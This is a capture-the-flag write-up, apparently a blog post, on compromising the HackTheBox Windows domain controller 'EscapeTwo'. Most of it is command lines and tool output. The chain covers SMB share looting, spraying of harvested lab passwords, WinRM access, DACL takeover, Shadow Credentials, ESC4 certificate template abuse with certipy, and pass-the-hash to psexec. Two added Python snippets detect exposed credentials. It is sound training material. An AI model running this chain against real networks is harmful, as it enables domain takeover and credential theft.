EscapeTwo

news / 2025/3/4 8:02:44 / Source: https://www.cnblogs.com/meraklbz/p/18746901

The challenge hands out a set of credentials up front:

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

Start with an nmap scan:

root@lbz-lenovo:/mnt/c/Users/86138# nmap -sC -sV -T4 10.129.221.182
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-02 13:48 CST
Nmap scan report for 10.129.221.182
Host is up (0.92s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE    VERSION
53/tcp   open  tcpwrapped
88/tcp   open  tcpwrapped
135/tcp  open  tcpwrapped
139/tcp  open  tcpwrapped
389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-03-02T05:50:16+00:00; -1s from scanner time.
445/tcp  open  tcpwrapped
464/tcp  open  tcpwrapped
593/tcp  open  tcpwrapped
636/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-03-02T05:50:10+00:00; -3s from scanner time.
1433/tcp open  ms-sql-s   Microsoft SQL Server  15.00.2000.00
| ms-sql-ntlm-info:
|   Target_Name: SEQUEL
|   NetBIOS_Domain_Name: SEQUEL
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: sequel.htb
|   DNS_Computer_Name: DC01.sequel.htb
|   DNS_Tree_Name: sequel.htb
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-03-02T05:45:48
|_Not valid after:  2055-03-02T05:45:48
|_ssl-date: 2025-03-02T05:50:12+00:00; -4s from scanner time.
3268/tcp open  tcpwrapped
3269/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-03-02T05:50:10+00:00; -3s from scanner time.

Host script results:
|_clock-skew: mean: -2s, deviation: 1s, median: -3s
| ms-sql-info:
|   10.129.221.182:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-03-02T05:49:33
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.53 seconds

SMB is open, but that alone does not get us a shell, so the next step is to list the shares the SMB service exposes.

crackmapexec smb 10.129.221.182 -u rose -p KxEPkKe6R8su --shares


Take a look at what is inside the Accounting Department share (READ access):

smbclient -U rose%KxEPkKe6R8su '//10.129.221.182/Accounting Department'


However, both xlsx files throw an error when opened directly. Extracting them as zip archives instead, accounts.xlsx contains a sharedStrings.xml that holds several usernames and passwords:

angela : 0fwz7Q4mSpurIt99
oscar  : 86LxLBMgEWaKUnBG
kevin  : Md9Wlq1E5bZnVDVo
sa     : MSSQLP@ssw0rd!
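An .xlsx file is only a zip container, and its sharedStrings.xml is plain XML, which is why the text survives even when Excel refuses to open the workbook. As an added example (not code from the original writeup), the Python below builds a deliberately broken workbook in memory, pulls the shared-string table out of it, and flags strings that look like generated passwords, the kind of check a defender can run over file shares; the sample strings and the password heuristic are constructed assumptions.

```python
"""Added example: read sharedStrings.xml out of an .xlsx the same way the
writeup does (treat it as a zip), then flag password-looking strings."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

SST_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"


def build_sample_xlsx():
    """Constructed minimal workbook container (not the file from the box).
    [Content_Types].xml is deliberately junk, so Excel would reject it,
    but sharedStrings.xml is still readable from the zip."""
    sst = (f'<sst xmlns="{SST_NS}" count="4" uniqueCount="4">'
           '<si><t>User</t></si><si><t>Password</t></si>'
           '<si><t>angela</t></si>'
           # rich-text cell: the value is split across two <r> runs
           '<si><r><t>Qm7xZ2p</t></r><r><t>Lw9KtRa</t></r></si>'
           '</sst>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/sharedStrings.xml", sst)
    return buf.getvalue()


def shared_strings(xlsx_bytes):
    """Return the shared strings in index order; rich-text runs are joined."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    tag_t = f"{{{SST_NS}}}t"
    return ["".join(t.text or "" for t in si.iter(tag_t))
            for si in root.findall("m:si", {"m": SST_NS})]


def credential_candidates(strings):
    """Heuristic (assumption): 12+ non-space chars with lower, upper and digits."""
    pat = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)\S{12,}$")
    return [s for s in strings if pat.match(s)]


if __name__ == "__main__":
    found = shared_strings(build_sample_xlsx())
    print(found)
    print("password-like:", credential_candidates(found))
```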

The last one is obviously an MSSQL login, so log in with MDUT. Browsing the file system from there shows the contents of the Users directory.

There is nothing in sql_svc, so the goal is presumably to find ryan's username and password.
SQL2019 contains a file sql-Configuration.INI, the MSSQL setup configuration file; download it and take a look.

[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True

It contains sql_svc with the password WqSZAF6CysDQbGb3. Spraying these passwords against ryan gives:
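Leftover setup files like the one above are a recurring finding, because SQLSVCPASSWORD and SAPWD store cleartext passwords and SECURITYMODE="SQL" turns on mixed-mode authentication. As an added example (not code from the original writeup), this Python scans such an INI and reports the exposures without echoing the secret values; the sample text is constructed from the values shown on this page, and which keys count as secrets or risky settings is the example's own assumption.

```python
"""Added example: flag cleartext passwords and mixed-mode auth in a
SQL Server setup configuration file (sql-Configuration.INI)."""
import re

# Constructed sample, values taken from the INI shown in the writeup.
SAMPLE_INI = r"""[OPTIONS]
ACTION="Install"
INSTANCENAME="SQLEXPRESS"
COMMFABRICNETWORKLEVEL=""0"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
IAcceptSQLServerLicenseTerms=True
"""

SECRET_KEY = re.compile(r"(PASSWORD|PWD)$", re.IGNORECASE)  # assumed rule
RISKY = {"SECURITYMODE": "SQL"}  # mixed-mode auth makes the 'sa' login usable


def parse_ini(text):
    """Minimal INI parser; tolerates the unbalanced quotes setup writes."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("[", ";", "#")) or "=" not in line:
            continue
        key, _, val = line.partition("=")
        opts[key.strip().upper()] = val.strip().strip('"')
    return opts


def find_exposures(text):
    """Return (key, finding) pairs; secret values are never included."""
    opts = parse_ini(text)
    hits = []
    for key, val in opts.items():
        if SECRET_KEY.search(key) and val:
            if key == "SAPWD":
                acct = "sa"
            else:  # e.g. SQLSVCPASSWORD -> SQLSVCACCOUNT
                acct = opts.get(key.replace("PASSWORD", "ACCOUNT"), "?")
            hits.append((key, f"cleartext password for {acct}"))
    for key, bad in RISKY.items():
        if opts.get(key, "").upper() == bad:
            hits.append((key, "mixed-mode authentication enabled"))
    return hits


if __name__ == "__main__":
    for key, finding in find_exposures(SAMPLE_INI):
        print(f"[!] {key}: {finding}")
```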

LDAP        10.129.221.182  389    DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3

The first spray over SMB turned up nothing; switching to LDAP produced this one hit. Tried every exec script in the impacket suite, and none of them could connect:

atexec.py
dcomexec.py
psexec.py
smbexec.py
wmiexec.py

In the end winrmexec.py from nxc connected, but it seemed to only echo single-line commands. Then I found the evil-winrm tool.

evil-winrm -i 10.129.221.182 -u ryan -p WqSZAF6CysDQbGb3

It drops straight into an interactive shell, very nice. The shell is PowerShell-based rather than cmd-based. Locate the first flag.

Collect domain information with bloodhound-python:

python3 bloodhound.py -u ryan -p WqSZAF6CysDQbGb3 -d sequel.htb -dc DC01.sequel.htb -ns 10.129.221.182 -c All --zip


ryan has write rights over ca_svc, so modifying the DACL gives full control of ca_svc.
If we had ca_svc's credentials we could simply grant ca_svc DCSync and dump hashes, but we don't.
Note that the system time has to be synchronized first, otherwise all sorts of strange errors appear (presumably related to certificate validity):

sudo ntpdate escapetwo.htb

First make ryan the owner of ca_svc:

impacket-owneredit -action write -new-owner ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3

Then edit ca_svc's DACL so that ryan has full control over ca_svc:

impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3

Next, use Shadow Credentials to obtain ca_svc's NTLM hash. This attack should be possible with full control over ca_svc.

certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -dc-ip 10.129.219.167
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b52c0cf5-dbad-ff9a-71a5-111e7fbe3a7c'
[*] Adding Key Credential with device ID 'b52c0cf5-dbad-ff9a-71a5-111e7fbe3a7c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'b52c0cf5-dbad-ff9a-71a5-111e7fbe3a7c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

Enumerate with the hash just obtained:

certipy-ad find -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.219.167 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

This reveals an ESC4 weakness on the template. The CA is sequel-DC01-CA and the Template Name is DunderMifflinAuthentication.
Use ca_svc's hash to rewrite the template so that it meets the attack's requirements:

certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.129.89.45

Next, request a certificate:

certipy-ad req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.129.89.45 -dns 10.129.89.45 -dc-ip 10.129.89.45

One thing to watch out for here: the certificate enumeration showed this field

Certificate Name Flag: SubjectRequireCommonName,SubjectAltRequireDns

so the -ns and -dns parameters must be added to the command. Not sure whether -target is required, but it is best to add it too. I was stuck on this for a very long time (:
Import the resulting certificate and obtain the domain administrator's NTLM hash:

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.129.249.162

Log in with pass-the-hash:

impacket-psexec -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff Administrator@sequel.htb -codec gbk

The flag is on the Administrator's desktop.

Summary: I'm a pentesting noob; a single box took me an entire day.
